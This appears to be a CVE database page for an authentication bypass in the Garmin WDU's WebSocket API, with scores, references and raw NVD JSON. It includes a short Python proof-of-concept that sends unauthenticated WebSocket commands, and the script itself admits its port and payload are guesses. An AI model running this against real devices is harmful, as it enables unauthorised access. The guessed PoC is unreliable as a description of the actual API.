CVE-2025-27853

Description

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows its authentication to be bypassed. The WDU web site only performs authentication with the client within the client's browser. The WebSockets used to communicate with the WDU server do not enforce any authentication. An attacker may bypass all authentication mechanisms by directly utilizing the remote APIs available on the websocket.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Garmin WDU v1 <= 1.4.6

Garmin WDU v2 <= 5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import websocket
import json

# PoC for CVE-2025-27853: Garmin WDU Authentication Bypass
# Description: Connects to the WebSocket interface and sends a command without authentication.
# Target: Garmin WDU v1 < 1.4.6 or v2 < 5.0

def exploit(target_ip):
    # Default WebSocket port might need to be discovered via port scanning
    ws_url = f"ws://{target_ip}:7681/api" 
    
    try:
        print(f"[*] Connecting to {ws_url}...")
        ws = websocket.create_connection(ws_url)
        
        # Example payload to retrieve device info or execute a command
        # The actual JSON structure depends on the Garmin WDU API specification
        payload = {
            "action": "getDeviceInfo",
            "params": {}
        }
        
        print(f"[*] Sending unauthenticated payload: {payload}")
        ws.send(json.dumps(payload))
        
        result = ws.recv()
        print(f"[+] Response received: {result}")
        
        ws.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27853
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27853
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27853/
[4] VulDB https://vuldb.com/cve/CVE-2025-27853
[5] https://garmin.com
[6] https://www8.garmin.com/support/ch.jsp?product=010-02642-00

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27853", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:41.463", "lastModified": "2026-05-14T17:06:08.693", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows its authentication to be bypassed. The WDU web site only performs authentication with the client within the client's browser. The WebSockets used to communicate with the WDU server do not enforce any authentication. An attacker may bypass all authentication mechanisms by directly utilizing the remote APIs available on the websocket."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://garmin.com", "source": "[email protected]"}, {"url": "https://www8.garmin.com/support/ch.jsp?product=010-02642-00", "source": "[email protected]"}]}}